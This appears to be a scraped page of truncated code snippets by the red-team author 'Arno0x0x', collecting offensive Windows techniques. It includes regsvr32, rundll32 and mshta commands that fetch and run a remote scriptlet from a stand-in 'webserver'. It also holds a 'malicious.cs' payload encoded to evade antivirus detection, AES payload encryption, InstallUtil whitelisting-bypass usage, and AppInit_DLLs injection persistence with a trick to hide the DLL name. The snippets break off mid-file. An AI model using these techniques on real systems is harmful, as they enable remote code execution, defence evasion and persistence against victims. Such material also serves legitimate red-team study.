Arno0x

<?XML version="1.0"?>
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
<scriptlet>
<registration 
    progid="PoC"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
	<script language="JScript">
		<![CDATA[
	

Arno0x

<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
  
	var r = new ActiveXObject("WScript.Shell").Run("calc.exe");

Arno0x

/*
============== Compile ============
Create Your Strong Name Key -> key.snk
 
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte
 
C:\Windows\Microsoft.NET\Framewor

Arno0x

/*
Author: Arno0x0x, Twitter: @Arno0x0x

DO NOT COMPILE THIS SOURCE FILE !

Encode this source in base64:
base64 -w0 malicious.cs > malicious.b64

Then paste it in the code in "not_detected.cs" source file

Arno0x

#!/bin/bash
if [[ $1 == "-i" ]]; then
    result=$(cat $2 | iconv --to-code UTF-16LE | base64 -w 0)
else
    result=$(echo "$1" | iconv --to-code UTF-16LE | base64 -w 0)
fi
echo $result

Arno0x

#!/usr/bin/python
# -*- coding: utf8 -*-
#
# Author: Arno0x0x, Twitter: @Arno0x0x
#

import argparse
from Crypto.Cipher import AES
import pyscrypt
from base64 import b64encode

Arno0x

/*
Author: Arno0x0x, Twitter: @Arno0x0x

===================================== COMPILING =====================================
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /unsafe /out:installUtil.dll installUtil.cs

===================================== USAGE =====================================
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logtoconsole=false /logfile= /u installUtil.dll

*/

Arno0x

/*
Author: Arno0x0x, Twitter: @Arno0x0x

===================================== COMPILING =====================================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:detected.exe detected.cs

*/

using System.Diagnostics;
using System.Runtime.InteropServices;

Arno0x

/*
	Creates a basic Windows Service using .Net framework.
	
	Compile:
		c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe service.cs
		
	Create the service with name "Service":
		sc create Service type=own binpath= c:\Path\To\service.exe
		
	Start the service:

Arno0x

// Compile with: cl.exe appinitdllinjection.c /LD /o appinitdllinjection.dll
//
// This DLL can only be injected in a x64 process
//
// Set the registry to automatically load this DLL into 'any' process that is started (at least the ones relying on User32.dll)
// by using the AppInit_DLLs capability:
//
// HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs = 'path_to_the_dll' (comma or space separated if required)
//	One trick with this registry entry is to separate DLLs with an hex '00' (by editing the value in binary) to hide the DLL name
//